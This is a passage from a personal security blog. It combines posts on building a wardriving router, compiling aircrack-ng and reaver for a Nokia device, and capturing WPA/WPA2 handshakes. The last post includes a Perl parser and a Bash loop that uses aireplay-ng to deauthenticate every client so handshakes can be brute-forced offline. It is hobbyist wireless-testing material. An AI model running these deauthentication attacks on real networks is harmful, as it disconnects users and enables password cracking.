Well the WRT54GL is not dead for me. Due to it’s popularity this venerable wireless router has been documented across the Internet on how to software and hardware hack it. Tinkering with this devices is a great way to learn about embedded Linux, cross-compilation, soldering, and serial communication. I continue to search for new ways to play with this router (I plan on adding some USB ports once my 12v/5v power supply arrives!). The reason I’m documenting my experiences is because I haven’t seen many tutorials where the device has a GPS module. I’ve seen some documentation on connecting a GPS device (Garmin) to a serial port. Mine goes the extra step and includes a module in the router for a nice compact wardriving box. I’m even able to set the date and time on the device after a GPS lock is obtained. So I’m going to put together a tutorial on the GPS module and the version of Openwrt, Kismet, and GPSd I used to allow this device to be a self contained wardriving box.
This tutorial will help you configure the Scratchbox environment to compile the latest svn of aircrack-ng, latest stable kismet, and reaver 1.4 for the Nokia n810. A lot of love is getting sent to the N900 but the n8x0 series of devices are still great for wireless testing. With this tutorial you will be able to compile the software and create Debian packages for easy installation on your Nokia device. Of important note were the errors I encountered while compiling aircrack-ng. The error had not been documented on the Internet. Trust me I Googled my heart out. Everyones solution was update the linux kernel headers. Well in this case that wasn’t possible. I’m not a Linux programmer but I figured out how to edit the header file to make the changed needed to get Aircrack-ng to compile.
This post deals with gathering the information you need to use aircrack-ng to capture a WPA/WPA2 handshake for offline bruteforce attacks. When running aireplay-ng to send out de-authentication packets you need the MAC address of the Access Point and a Client that is associated with it. The way I would collect the information is run Kismet. With the older version of Kismet I would monitor the client (panel view) and select (copy/paste) the access point and client MAC. With the new version of Kismet you cannot select a MAC address. So I wrote myself a quick Perl script to parse the Kismet NETXML file to create output with the MAC addresses of AP and associated client pairs.
#!/usr/bin/perl
use XML::Simple;
$xs = XML::Simple->new( KeyAttr=>[] );
$data = $xs->XMLin($ARGV[0]);
for $wn (@{$data->{'wireless-network'}}){
$channel = $wn->{'channel'};
$bssid = $wn->{'BSSID'};
if(ref($wn->{'SSID'}->{'encryption'}) eq 'ARRAY' && $wn->{'type'} eq 'infrastructure')
{
if(ref($wn->{'wireless-client'}) eq 'ARRAY'){
for $wc (@{$wn->{'wireless-client'}}){
if($wc->{'type'} eq 'tods'){
print $bssid . " " . $wc->{'client-mac'} . "\n"
}
}
}
}
}
I then use the file that was created in a simple Bash script to use aireplay-ng to knock all the clients offline. Of course you have airodump-ng listening for the WPA/WPA2 handshakes.
#!/bin/bash
set -x
AIREPLAY=/usr/local/sbin/aireplay-ng
WIFACE=$1
FILE=$2
while read bssid clientmac
do
echo $x
$AIREPLAY -0 1 -a $bssid -c $clientmac --ignore-negative-one $WIFACE
done < $FILE
Welcome to jedge.com. I’m James Edge the host of this site. My goal for this site is to create a colaborative portal for documents, links, and thoughts regarding auditing Information System security at a state goverment level. I’ve been working in state government for a few years with both New York and Georgia state and I hope to express my thoughts and opinions related to auditing with what I’ve experienced working for those governments. Enjoy the site and feel free to post a comment for whatever reason. I hope the feedback I receive will further improve the site. Thanks.